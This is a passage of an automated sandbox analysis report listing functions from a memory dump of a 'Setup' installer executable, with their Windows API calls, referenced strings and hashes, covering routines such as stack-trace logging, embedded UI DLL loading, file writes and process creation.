Instruction ID: fb09ebce7b7d13879858957ab240e9081a330409c35f5fe3e9b1f348a37cc260
Opcode Fuzzy Hash: 6c95a0947f45c034e8984bbb9cf9bf0b7a3b50fd787bdac71be3173599df1c48
Instruction Fuzzy Hash: 2F11D2F5905248DFD750CF58D944749BBF4FB09728F20869EE8189B781D3769A0ACF84

Function 008A6DE0 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 640d784bb508a8bb2d437c14112fda1c0db6fb411a884fdda67588a9d1d39641
Instruction ID: 8a0bf03deef5709418d86cf4a4a8a3be278f41b94d5a2ae496afc0f1a0f5935c
Opcode Fuzzy Hash: 640d784bb508a8bb2d437c14112fda1c0db6fb411a884fdda67588a9d1d39641
Instruction Fuzzy Hash: 0FD1D076B083558FE7148E2CD88072ABBE1FBDA300F584A3EF896C7754E671D9458B42

Function 00736BC0 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf0e6d60c6145e29bb1f2b0a44b573c718839539bbd0725f387479af4a355e47
Instruction ID: 638e858e33b1290def5e47a8d001a6bfb6552a6c718133668fd7fc883032e4d1
Opcode Fuzzy Hash: bf0e6d60c6145e29bb1f2b0a44b573c718839539bbd0725f387479af4a355e47
Instruction Fuzzy Hash: F5E175766183169FD700CF29C48162AFBE1FBC9754F498A6DE899A7341D634ED08CB82

Function 0084E120 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 308libraryloaderthreadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00A6B494,275F26E1), ref: 0084E193
EnterCriticalSection.KERNEL32(00A6B494,275F26E1), ref: 0084E1A8
GetCurrentProcess.KERNEL32 ref: 0084E1B5
GetCurrentThread.KERNEL32 ref: 0084E1C3
SymSetOptions.IMAGEHLP(80000016), ref: 0084E1F1
LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 0084E268
GetProcAddress.KERNEL32(00000000), ref: 0084E26F
SymInitialize.IMAGEHLP(00000000,00000000,00000001,009D3180,00000000), ref: 0084E2B5
StackWalk.IMAGEHLP(0000014C,?,?,?,?,00000000,00000000,*** Stack Trace (x86) ***,0000001F,?,?,?), ref: 0084E3F1
GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?), ref: 0084E4AA
SymCleanup.IMAGEHLP(00000000,?), ref: 0084E5C3
LeaveCriticalSection.KERNEL32(00A6B494,?), ref: 0084E5EE

Strings

SymFromAddr, xrefs: 0084E25E
Dbghelp.dll, xrefs: 0084E263
[0x%.8Ix] , xrefs: 0084E4B1
*** Stack Trace (x86) ***, xrefs: 0084E387
<--------------------MORE--FRAMES-------------------->, xrefs: 0084E44D
&_', xrefs: 0084E137
MODULE_BASE_ADDRESS, xrefs: 0084E4F7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CriticalSection$CurrentInitialize$AddressCleanupEnterHandleLeaveLibraryLoadModuleOptionsProcProcessStackThreadWalk
String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix] $&_'
API String ID: 4282195395-599865413
Opcode ID: 377fa5177338fd476056d98442ef45af11964ebb9b1eec829b45aecb08cad9cc
Instruction ID: 013f904d45dfa6405dbd84ca871134789dbf392d7c2f62360ff02b0c36bac6f4
Opcode Fuzzy Hash: 377fa5177338fd476056d98442ef45af11964ebb9b1eec829b45aecb08cad9cc
Instruction Fuzzy Hash: 0BD1DC70A0466CAEDB20CF64CC49BEEBBB4BF15304F0042D8E509A7281EBB46B80CF55

Function 0072E430 Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 372libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 0072E558
GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 0072E56A
GetProcAddress.KERNEL32(00000000,ShutdownEmbeddedUI), ref: 0072E578
GetProcAddress.KERNEL32(00000000,EmbeddedUIHandler), ref: 0072E587

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Strings

EmbeddedUIHandler, xrefs: 0072E57E
INAN, xrefs: 0072E465
&_', xrefs: 0072E45F
f1263881, xrefs: 0072E69E
SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll', xrefs: 0072E4B9
22.2, xrefs: 0072E67A
build , xrefs: 0072E68F
&_', xrefs: 0072E444, 0072E5E6, 0072E767
ShutdownEmbeddedUI, xrefs: 0072E570
InitializeEmbeddedUI, xrefs: 0072E564

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AddressProc$Heap$AllocateLibraryLoadProcess
String ID: build $22.2$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI$f1263881$&_'$&_'
API String ID: 230625546-2261392002
Opcode ID: a98563af494e6bfe50c7b1aa4167f145788839df0b7e854d26f9d2f438e1025a
Instruction ID: 3cde1a64a7702b0a0181d6fe0c5410f1ccade531cb502f902492cc2a815f8f54
Opcode Fuzzy Hash: a98563af494e6bfe50c7b1aa4167f145788839df0b7e854d26f9d2f438e1025a
Instruction Fuzzy Hash: 3CD1C071E012199FCB04DFA8DC56BAEBBB5FF44714F14811DE811A7381EB74AA05CB94

Function 006F11F0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 270libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,275F26E1,?,?,?,?,?,?,?,?,?,?,?,?,275F26E1), ref: 006F1273
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 006F1279
LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,009D3180,00000000,00000000,00000000,?,?), ref: 006F142B

Strings

RoGetActivationFactory, xrefs: 006F1269
DllGetActivationFactory, xrefs: 006F146E
.dll, xrefs: 006F1412
&_', xrefs: 006F1218
combase.dll, xrefs: 006F126E, 006F1315
CoIncrementMTAUsage, xrefs: 006F1310

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: LibraryLoad$AddressProc
String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll$&_'
API String ID: 1469910268-4023432018
Opcode ID: aa78edb5a7879484b1809c662b2f6b0b27e767d8977e107e6b58921a8c9fa273
Instruction ID: 2aa64e75793666757fd1eb6981fcfe13c1fa02b81f75763f6587f8e081d99d26
Opcode Fuzzy Hash: aa78edb5a7879484b1809c662b2f6b0b27e767d8977e107e6b58921a8c9fa273
Instruction Fuzzy Hash: FBB1CD71D0021DEFCF10DFA8D845BADBBB6BF85744F11812AE911AB390DB749901CB90

Function 0083E110 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 211fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00A68370,275F26E1,00000000,00000010), ref: 0083E14C

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

EnterCriticalSection.KERNEL32(00000010,275F26E1,00000000,00000010), ref: 0083E159
WriteFile.KERNEL32(00000000,?,00000000,00000003,00000000), ref: 0083E18B
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000003,00000000), ref: 0083E194
WriteFile.KERNEL32(00000000,?,00000000,00000003,00000000,009D3150,00000001,?,00000000,00000003,00000000), ref: 0083E22C
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000003,00000000), ref: 0083E235
WriteFile.KERNEL32(00000000,?,?,00000003,00000000,?,00000000,00000003,00000000), ref: 0083E27D
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000003,00000000), ref: 0083E286
WriteFile.KERNEL32(00000000,?,00000000,00000003,00000000,009D6DBC,00000002,?,00000000,00000003,00000000), ref: 0083E2F5
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000003,00000000), ref: 0083E2FE
LeaveCriticalSection.KERNEL32(00000000,?,00000000,00000003,00000000), ref: 0083E33A

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

Strings

&_', xrefs: 0083E127

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$BuffersFlushWrite$CriticalSection$EnterFindHeapInitializeLeaveProcessResource
String ID: &_'
API String ID: 3680465103-2411122644
Opcode ID: 810046c7b73503a6e56b1f1a27eac1b45d7f5be92f5c9c582a9a7ba4761311c7
Instruction ID: dd64edccd568ae8f6f33360f641edac9ffd1a8643200727db4f55f90f4fdf448
Opcode Fuzzy Hash: 810046c7b73503a6e56b1f1a27eac1b45d7f5be92f5c9c582a9a7ba4761311c7
Instruction Fuzzy Hash: D4719C35A092489FDB01DFA8CC4ABAEBBB5FF45320F144198E811E73A1DB749D01DBA1

Function 008533C0 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 444libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00853526
GetProcAddress.KERNEL32(00000000), ref: 0085352D
GetCurrentProcess.KERNEL32(?,00000000,?,?,?,00000000), ref: 00853567

Strings

kernel32, xrefs: 00853521
No acceptable version found., xrefs: 0085389F, 008538A0
Searching for:, xrefs: 0085366C
IsWow64Process2, xrefs: 0085351C
Undefined, xrefs: 0085387E
&_', xrefs: 008533E8
Wrong OS or Os language for:, xrefs: 0085392F
Search result:, xrefs: 00853813

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process2$No acceptable version found.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32$&_'
API String ID: 4190356694-3122577327
Opcode ID: 6d42c4523508586af2eeeba3d81073860e19badd54c102867f6640c4944cd5f4
Instruction ID: 5a0d0b266fa451dd47469361cede81c3b1bda3d7b4cae205c63789129fb9efb3
Opcode Fuzzy Hash: 6d42c4523508586af2eeeba3d81073860e19badd54c102867f6640c4944cd5f4
Instruction Fuzzy Hash: 9402BFB0A006099FDB14DFA8C855BADBBB1FF45355F144218E812EB391DB74EE4ACB81

Function 0071E1B0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 231windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000), ref: 0071E238

Part of subcall function 006F9F60: SetWindowLongW.USER32(?,000000FC,00000000), ref: 006F9FA2

SendMessageW.USER32(?,00000432,00000000,0000002C), ref: 0071E344
SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 0071E358
SendMessageW.USER32(?,00000421,00000003,?), ref: 0071E36D
SendMessageW.USER32(?,00000418,00000000,0000012C), ref: 0071E382
SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 0071E399
GetWindowRect.USER32(?,00000000), ref: 0071E3CB
SendMessageW.USER32(?,00000412,00000000), ref: 0071E427
SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0071E43B

Strings

tooltips_class32, xrefs: 0071E232
&_', xrefs: 0071E1C4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend$Window$CreateLongRect
String ID: tooltips_class32$&_'
API String ID: 1954517558-2280603502
Opcode ID: b22904e937ec9a5117680c1c74a452eb16fde1f3a19620335b106e847e3e20c9
Instruction ID: cbf83084d5653b929fc8279154c2c847e43a1bf5a206386328471dcbcac73ec6
Opcode Fuzzy Hash: b22904e937ec9a5117680c1c74a452eb16fde1f3a19620335b106e847e3e20c9
Instruction Fuzzy Hash: 179140B1A00259AFDB14CFA4CD55BEEBBF9FB48300F14852AF506EB290D774A945CB50

Function 0077C150 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 0077C197
GetParent.USER32(00000000), ref: 0077C1AA
GetWindow.USER32(00000000,00000004), ref: 0077C1B5
GetWindowRect.USER32(00000000,?), ref: 0077C1C3
GetWindowLongW.USER32(00000000,000000F0), ref: 0077C1D6
MonitorFromWindow.USER32(00000000,00000002), ref: 0077C1EE
GetMonitorInfoW.USER32(00000000,?), ref: 0077C204
GetWindowRect.USER32(00000000,?), ref: 0077C22A
SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 0077C2E5

Strings

&_', xrefs: 0077C178

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$LongMonitorRect$FromInfoParent
String ID: &_'
API String ID: 1468510684-2411122644
Opcode ID: 04440be337e983fe5b125d04da05bb2aad5380d63f2163d4d043381bdff1d1dd
Instruction ID: 2cef9eaa34181eb0fd1ef78bde9aececdbaf64a3f2bec2c63a2295a4a0173840
Opcode Fuzzy Hash: 04440be337e983fe5b125d04da05bb2aad5380d63f2163d4d043381bdff1d1dd
Instruction Fuzzy Hash: DD5192729001089FDF21CFA8DD49AAEBBF5FB48750F258229F819E3295DB34AD41CB50

Function 00738E70 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 472memorysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

CreateThread.KERNEL32(00000000,00000000,00738FE0,009D919C,00000000,?), ref: 00738F44
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00738F5D
CloseHandle.KERNEL32(00000000), ref: 00738F73
CoInitializeEx.COMBASE(00000000,00000000), ref: 00739045
GetProcessHeap.KERNEL32(?,00000000), ref: 00739158
HeapFree.KERNEL32(00000000,?,00000000), ref: 0073915E
GetProcessHeap.KERNEL32(?,00000000), ref: 007391EF
HeapFree.KERNEL32(00000000,?,00000000), ref: 007391F5
CoUninitialize.COMBASE ref: 00739358

Strings

&_', xrefs: 00738E9A, 00738FF7, 00739411

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Heap$Process$Free$CloseCreateHandleInitializeObjectSingleThreadUninitializeWait
String ID: &_'
API String ID: 661592132-2411122644
Opcode ID: a3f55f7cc29de8fe9074118461791bb9932487fd960f9c36d662b1158da8cc8a
Instruction ID: 1691b37b7b37955ca91eb1bdaa3a85fe25dbffc67be2f90d6a34d71dd638b433
Opcode Fuzzy Hash: a3f55f7cc29de8fe9074118461791bb9932487fd960f9c36d662b1158da8cc8a
Instruction Fuzzy Hash: 6A02BEB1D04309DFEF14CFA4C845BAEBBB8FF44314F104159E915AB292DBB8AA05CB91

Function 006F65F0 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 283memoryCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 006F662E
SysAllocString.OLEAUT32(?), ref: 006F6646
VariantInit.OLEAUT32(?), ref: 006F6681
VariantClear.OLEAUT32(?), ref: 006F66EA
VariantClear.OLEAUT32(?), ref: 006F66F8
VariantClear.OLEAUT32(?), ref: 006F6706
VariantClear.OLEAUT32(?), ref: 006F6717

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

&_', xrefs: 006F6798, 006F67B3, 006F686B, 006F67A0, 006F67E2, 006F67E3, 006F687D
&_', xrefs: 006F6606, 006F6774, 006F68D4
<body><h3 style="color:green;">Error loading resource:</h3><p style="white-space:nowrap">"%s"</p></body>, xrefs: 006F679B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Variant$Clear$AllocAllocateHeapInitString
String ID: <body><h3 style="color:green;">Error loading resource:</h3><p style="white-space:nowrap">"%s"</p></body>$&_'$&_'
API String ID: 1547307772-534819544
Opcode ID: 97989f2c5bfc30132b5ec350c81b147fcef0f1fcfad3c1236df2134521d2f305
Instruction ID: a4bb2129c25a4539190063050b2671066a0ef1917a22dc2b5d8e73947a3481d6
Opcode Fuzzy Hash: 97989f2c5bfc30132b5ec350c81b147fcef0f1fcfad3c1236df2134521d2f305
Instruction Fuzzy Hash: 4BA18C71D04258EFCB00DFA8DC48BAEBBB9FF49324F144259E915E7290DB74AA41CB90

Function 008644A0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 320processfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00865DD0: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000010), ref: 00865DFD

Part of subcall function 006F36E0: GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,?), ref: 006F37D7
Part of subcall function 006F36E0: GetProcAddress.KERNEL32(00000000), ref: 006F37DE
Part of subcall function 006F36E0: PathFileExistsW.SHLWAPI(?), ref: 006F384C

GetFileAttributesW.KERNEL32(?,?,00000003,?,00000001,?,00000000,00000000), ref: 00864648
SetFileAttributesW.KERNEL32(?,00000080), ref: 0086465B
CopyFileW.KERNEL32(?,?,00000000), ref: 00864668

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 008647AA
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 008647C0
CloseHandle.KERNEL32(?), ref: 008647E1
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 008647F4

Strings

&_', xrefs: 008644B7
"%s" %s, xrefs: 008646DE

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$Wow64$AttributesHandleModuleProcessRedirectionRevert$AddressCloseCopyCreateExistsHeapNamePathProc
String ID: "%s" %s$&_'
API String ID: 3861218247-2124839409
Opcode ID: a5040a837bc74e7d1065fa5f68aa2e097abbb0382eaac7fc4bdab7ada58f4b00
Instruction ID: d547e54ddb32f3d74c71ef6628490d1736bfb56cf843fdbdc70da3600d85eba8
Opcode Fuzzy Hash: a5040a837bc74e7d1065fa5f68aa2e097abbb0382eaac7fc4bdab7ada58f4b00
Instruction Fuzzy Hash: F8D19C31E04648DFDB14DBA8CC09BADBBB2FF49314F25825DE411AB291DB74AA45CF81

Function 006EEC70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 179processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 006EED88
